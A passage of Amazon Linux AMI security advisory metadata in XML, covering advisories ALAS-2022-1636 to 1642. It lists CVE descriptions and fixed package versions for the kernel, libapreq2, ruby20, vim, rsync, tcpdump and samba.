arch="x86_64"><filename>Packages/golang-race-1.18.6-1.42.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.18.6" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.18.6-1.42.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.18.6" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.18.6-1.42.amzn1.i686.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.18.6-1.42.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.18.6" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.18.6-1.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1636</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1636: important priority package update for kernel</title><issued date="2022-09-30 02:41:00" /><updated date="2025-03-13 20:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-2860:
The upstream advisory describes this issue as follows:
"This vulnerability allows local attackers to disclose sensitive information on affected installations of the Linux Kernel. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the processing of seg6 attributes. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilties to escalate privileges and execute arbitrary code in the context of the kernel."
CVE-2022-49700:
In the Linux kernel, the following vulnerability has been resolved:
mm/slub: add missing TID updates on slab deactivation
CVE-2022-49647:
In the Linux kernel, the following vulnerability has been resolved:
cgroup: Use separate src/dst nodes when preloading css_sets for migration
CVE-2022-48687:
In the Linux kernel, the following vulnerability has been resolved: ipv6: sr: fix out-of-bounds read when setting HMAC data. The SRv6 layer allows defining HMAC data that can later be used to sign IPv6 Segment Routing Headers. This configuration is realised via netlink through four attributes: SEG6_ATTR_HMACKEYID, SEG6_ATTR_SECRET, SEG6_ATTR_SECRETLEN and SEG6_ATTR_ALGID.
CVE-2022-40307:
A race condition in the Linux kernel's EFI capsule loader driver was found in the way it handled write and flush operations on the device node of the EFI capsule. A local user could potentially use this flaw to crash the system.
CVE-2022-39188:
An issue was discovered in include/asm-generic/tlb.h in the Linux kernel before 5.19. Because of a race condition (unmap_mapping_range versus munmap), a device driver can free a page while it still has stale TLB entries. This only occurs in situations with VM_PFNMAP VMAs.
CVE-2022-36946:
A memory corruption flaw was found in the Linux kernel's Netfilter subsystem in the way a local user uses the libnetfilter_queue when analyzing a corrupted network packet. This flaw allows a local user to crash the system or a remote user to crash the system when the libnetfilter_queue is used by a local user.
CVE-2022-36879:
An issue was discovered in the Linux kernel through 5.18.14. xfrm_expand_policies in net/xfrm/xfrm_policy.c can cause a refcount to be dropped twice.
CVE-2022-36123:
A memory access flaw was found in the Linux kernel's XEN hypervisor for the virtual machine. This flaw allows a local user to crash the system or potentially escalate their privileges on the system.
CVE-2022-3028:
A race condition was found in the Linux kernel's IP framework for transforming packets (XFRM subsystem) when multiple calls to xfrm_probe_algs occurred simultaneously. This flaw could allow a local attacker to potentially trigger an out-of-bounds write or leak kernel heap memory by performing an out-of-bounds read and copying it into a socket.
CVE-2022-29901:
Intel microprocessor generations 6 to 8 are affected by a new Spectre variant that is able to bypass their retpoline mitigation in the kernel to leak arbitrary data. An attacker with unprivileged user access can hijack return instructions to achieve arbitrary speculative code execution under certain microarchitecture-dependent conditions.
CVE-2022-28693:
A flaw was found in hw. The unprotected alternative channel of return branch target prediction in some Intel(R) Processors may allow an authorized user to enable information disclosure via local access.
CVE-2022-2663:
An issue was found in the Linux kernel in nf_conntrack_irc where the message handling can be confused and incorrectly matches the message. A firewall may be able to be bypassed when users are using unencrypted IRC with nf_conntrack_irc configured.
CVE-2022-2588:
A use-after-free flaw was found in route4_change in the net/sched/cls_route.c filter implementation in the Linux kernel. This flaw allows a local user to crash the system and possibly lead to a local privilege escalation problem.
CVE-2022-2153:
A flaw was found in the Linux kernel's KVM when attempting to set a SynIC IRQ. This issue makes it possible for a misbehaving VMM to write to SYNIC/STIMER MSRs, causing a NULL pointer dereference. This flaw allows an unprivileged local attacker on the host to issue specific ioctl calls, causing a kernel oops condition that results in a denial of service.
CVE-2022-1679:
A use-after-free flaw was found in the Linux kernel's Atheros wireless adapter driver in the way a user forces the ath9k_htc_wait_for_target function to fail with some input messages. This flaw allows a local user to crash or potentially escalate their privileges on the system.
CVE-2022-1462:
An out-of-bounds read flaw was found in the Linux kernel's TeleTYpe subsystem. The issue occurs in how a user triggers a race condition using ioctls TIOCSPTLCK and TIOCGPTPEER and TIOCSTI and TCXONC with leakage of memory in the flush_to_ldisc function. This flaw allows a local user to crash the system or read unauthorized random data from memory.
CVE-2021-4159:
A vulnerability was found in the Linux kernel's EBPF verifier when handling internal data structures. Internal memory locations could be returned to userspace. A local attacker with the permissions to insert eBPF code to the kernel can use this to leak internal kernel memory details defeating some of the exploit mitigations in place for the kernel.
CVE-2021-33655:
An out-of-bounds write flaw was found in the Linux kernel&rsquo;s framebuffer-based console driver functionality in the way a user triggers ioctl FBIOPUT_VSCREENINFO with malicious data. This flaw allows a local user to crash or potentially escalate their privileges on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33655" title="" id="CVE-2021-33655" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4159" title="" id="CVE-2021-4159" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1462" title="" id="CVE-2022-1462" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1679" title="" id="CVE-2022-1679" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2153" title="" id="CVE-2022-2153" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2588" title="" id="CVE-2022-2588" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2663" title="" id="CVE-2022-2663" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28693" title="" id="CVE-2022-28693" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29901" title="" id="CVE-2022-29901" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3028" title="" id="CVE-2022-3028" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36123" title="" id="CVE-2022-36123" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36879" title="" id="CVE-2022-36879" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946" title="" id="CVE-2022-36946" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39188" title="" id="CVE-2022-39188" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40307" title="" id="CVE-2022-40307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48687" title="" id="CVE-2022-48687" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49647" title="" id="CVE-2022-49647" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49700" title="" id="CVE-2022-49700" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2860" title="" id="CVE-2023-2860" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.294-150.533.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1637</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1637: important priority package update for libapreq2</title><issued date="2022-09-30 02:41:00" /><updated date="2022-10-10 20:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-22728:
A flaw in Apache libapreq2 versions 2.16 and earlier could cause a buffer overflow while processing multipart form uploads. A remote attacker could send a request causing a process crash which could lead to a denial of service attack.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22728" title="" id="CVE-2022-22728" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libapreq2-libs" version="2.13" release="38.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-libs-2.13-38.3.amzn1.x86_64.rpm</filename></package><package name="perl-libapreq2" version="2.13" release="38.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-libapreq2-2.13-38.3.amzn1.x86_64.rpm</filename></package><package name="libapreq2-debuginfo" version="2.13" release="38.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-debuginfo-2.13-38.3.amzn1.x86_64.rpm</filename></package><package name="libapreq2-devel" version="2.13" release="38.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-devel-2.13-38.3.amzn1.x86_64.rpm</filename></package><package name="libapreq2" version="2.13" release="38.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-2.13-38.3.amzn1.x86_64.rpm</filename></package><package name="libapreq2" version="2.13" release="38.3.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-2.13-38.3.amzn1.i686.rpm</filename></package><package name="libapreq2-libs" version="2.13" release="38.3.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-libs-2.13-38.3.amzn1.i686.rpm</filename></package><package name="libapreq2-devel" version="2.13" release="38.3.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-devel-2.13-38.3.amzn1.i686.rpm</filename></package><package name="perl-libapreq2" version="2.13" release="38.3.amzn1" epoch="0" arch="i686"><filename>Packages/perl-libapreq2-2.13-38.3.amzn1.i686.rpm</filename></package><package name="libapreq2-debuginfo" version="2.13" release="38.3.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-debuginfo-2.13-38.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1638</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1638: medium priority package update for ruby20</title><issued date="2022-10-03 19:29:00" /><updated date="2022-10-10 20:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-28739:
A buffer overrun vulnerability was found in Ruby. The issue occurs in a conversion algorithm from a String to a Float that causes process termination due to a segmentation fault, but under limited circumstances. This flaw may cause an illegal memory read.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28739" title="" id="CVE-2022-28739" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby20-libs" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-2.41.amzn1.x86_64.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.41.amzn1.x86_64.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-2.41.amzn1.noarch.rpm</filename></package><package name="ruby20-irb" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-2.41.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-2.41.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="2.41.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-2.41.amzn1.noarch.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-2.41.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-2.41.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.41.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14.1" release="2.41.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-2.41.amzn1.noarch.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-2.41.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-2.41.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-2.41.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.648-2.41.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.41.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.41.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-2.41.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-2.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1639</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1639: low priority package update for vim</title><issued date="2022-10-17 20:22:00" /><updated date="2022-10-20 20:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-3037:
Use After Free in GitHub repository vim/vim prior to 9.0.0322.
CVE-2022-2819:
A flaw was found in vim. The vulnerability occurs due to illegal memory access and leads to a heap buffer overflow vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-2817:
A use-after-free vulnerability was found in Vim in the string_quote function in the strings.c file. This issue occurs because an already freed memory is used when a specially crafted input is processed. This flaw allows an attacker who can trick a user into opening a specially crafted file into triggering the use-after-free, causing the application to crash, possibly executing code and corrupting memory.
CVE-2022-2816:
An out-of-bounds read vulnerability was found in Vim in the check_vim9_unlet function in the vim9cmds.c file. This issue occurs because of invalid memory access when compiling the unlet command when a specially crafted input is processed. This flaw allows an attacker who can trick a user into opening a specially crafted file into triggering the out-of-bounds read, causing the application to crash, possibly executing code and corrupting memory.
CVE-2022-2345:
A use-after-free vulnerability was found in Vim in the skipwhite function in the charset.c file. This issue occurs because an already freed memory is used when a specially crafted input is processed. This flaw allows an attacker who can trick a user into opening a specially crafted file into triggering the use-after-free, and cause the application to crash, possibly executing code and corrupting memory.
CVE-2022-2344:
A heap-based buffer overflow was found in Vim in the ins_compl_add function in the insexpand.c file. This issue occurs due to a read past the end of a buffer when a specially crafted input is processed. This flaw allows an attacker who can trick a user into opening a specially crafted file into triggering the heap-based buffer overflow, causing the application to crash, possibly executing code and corrupting memory.
CVE-2022-2343:
A heap-based buffer overflow was found in Vim in the ins_compl_add function in the insexpand.c file. This issue occurs due to a read past the end of a buffer when a specially crafted input is processed. This flaw allows an attacker who can trick a user into opening a specially crafted file into triggering the heap-based buffer overflow, causing the application to crash, possibly executing code and corrupting memory.
CVE-2022-2304:
A stack-based buffer overflow vulnerability was found in Vim's spell_dump_compl() function of the src/spell.c file. This issue occurs because the spell dump goes beyond the end of an array when crafted input is processed. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering an out-of-bounds write that causes an application to crash, possibly executing code and corrupting memory.
CVE-2022-2289:
Use After Free in GitHub repository vim/vim prior to 9.0.
CVE-2022-2288:
Out-of-bounds Write in GitHub repository vim/vim prior to 9.0.
CVE-2022-2287:
Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.
CVE-2022-2286:
Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.
CVE-2022-2285:
Integer Overflow or Wraparound in GitHub repository vim/vim prior to 9.0.
CVE-2022-2284:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.
CVE-2022-2264:
A heap buffer overflow vulnerability was found in Vim's inc() function of misc2.c. This issue occurs because Vim reads beyond the end of the line with a put command. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering an out-of-bounds read that causes a crash in the CLI tool.
CVE-2022-2257:
A flaw was found in vim, which is vulnerable to an out-of-bounds read in the msg_outtrans_special function. This flaw allows a specially crafted file to crash software or execute code when opened in vim.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2257" title="" id="CVE-2022-2257" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2264" title="" id="CVE-2022-2264" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2284" title="" id="CVE-2022-2284" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2285" title="" id="CVE-2022-2285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2286" title="" id="CVE-2022-2286" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2287" title="" id="CVE-2022-2287" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2288" title="" id="CVE-2022-2288" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2289" title="" id="CVE-2022-2289" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2304" title="" id="CVE-2022-2304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2343" title="" id="CVE-2022-2343" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2344" title="" id="CVE-2022-2344" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2345" title="" id="CVE-2022-2345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2816" title="" id="CVE-2022-2816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2817" title="" id="CVE-2022-2817" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2819" title="" id="CVE-2022-2819" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3037" title="" id="CVE-2022-3037" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-enhanced" version="9.0.475" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.475-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="9.0.475" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.475-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.475" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.475-1.1.amzn1.noarch.rpm</filename></package><package name="vim-debuginfo" version="9.0.475" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.475-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="9.0.475" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.475-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="9.0.475" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.475-1.1.amzn1.noarch.rpm</filename></package><package name="vim-debuginfo" version="9.0.475" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.475-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.475" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.475-1.1.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="9.0.475" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.475-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.475" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.475-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1640</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1640: important priority package update for rsync</title><issued date="2022-12-01 17:33:00" /><updated date="2022-12-10 00:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-25032:
An out-of-bounds access flaw was found in zlib, which allows memory corruption when deflating (ex: when compressing) if the input has many distant matches. For some rare inputs with a large number of distant matches (crafted payloads), the buffer into which the compressed or deflated data is written can overwrite the distance symbol table which it overlays. This issue results in corrupted output due to invalid distances, which leads to out-of-bound access, corrupting the memory and potentially crashing the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032" title="" id="CVE-2018-25032" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rsync-debuginfo" version="3.0.6" release="12.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsync-debuginfo-3.0.6-12.14.amzn1.x86_64.rpm</filename></package><package name="rsync" version="3.0.6" release="12.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsync-3.0.6-12.14.amzn1.x86_64.rpm</filename></package><package name="rsync" version="3.0.6" release="12.14.amzn1" epoch="0" arch="i686"><filename>Packages/rsync-3.0.6-12.14.amzn1.i686.rpm</filename></package><package name="rsync-debuginfo" version="3.0.6" release="12.14.amzn1" epoch="0" arch="i686"><filename>Packages/rsync-debuginfo-3.0.6-12.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1641</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1641: medium priority package update for tcpdump</title><issued date="2022-12-01 17:33:00" /><updated date="2022-12-10 00:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15167:
The VRRP parser in tcpdump before 4.9.3 has a buffer over-read in print-vrrp.c:vrrp_print() for VRRP version 3, a different vulnerability than CVE-2018-14463.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15167" title="" id="CVE-2019-15167" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tcpdump-debuginfo" version="4.9.2" release="4.24.amzn1" epoch="14" arch="x86_64"><filename>Packages/tcpdump-debuginfo-4.9.2-4.24.amzn1.x86_64.rpm</filename></package><package name="tcpdump" version="4.9.2" release="4.24.amzn1" epoch="14" arch="x86_64"><filename>Packages/tcpdump-4.9.2-4.24.amzn1.x86_64.rpm</filename></package><package name="tcpdump" version="4.9.2" release="4.24.amzn1" epoch="14" arch="i686"><filename>Packages/tcpdump-4.9.2-4.24.amzn1.i686.rpm</filename></package><package name="tcpdump-debuginfo" version="4.9.2" release="4.24.amzn1" epoch="14" arch="i686"><filename>Packages/tcpdump-debuginfo-4.9.2-4.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1642</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1642: important priority package update for samba</title><issued date="2022-12-01 17:33:00" /><updated date="2022-12-10 00:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-32746:
A flaw was found in the Samba AD LDAP server. The AD DC database audit logging module can access LDAP message values freed by a preceding database module, resulting in a use-after-free issue. This issue is only possible when modifying certain privileged attributes, such as userAccountControl.
CVE-2022-32745:
A flaw was found in Samba. Samba AD users can cause the server to access uninitialized data with an LDAP add or modify the request, usually resulting in a segmentation fault.
CVE-2022-32744:
A flaw was found in Samba. The KDC accepts kpasswd requests encrypted with any key known to it. By encrypting forged kpasswd requests with its own key, a user can change other users' passwords, enabling full domain takeover.
CVE-2022-32742:
A flaw was found in Samba. Some SMB1 write requests were not correctly range-checked to ensure the client had sent enough data to fulfill the write, allowing server memory contents to be written into the file (or printer) instead of client-supplied data. The client cannot control the area of the server memory written to the file (or printer).
CVE-2020-17049:
It was found that the Kerberos Key Distribution Center (KDC) delegation feature, Service for User (S4U), did not sufficiently protect the tickets it's providing from tempering. A malicious, authenticated service principal allowed to delegate could use this flaw to impersonate a non-forwardable user.
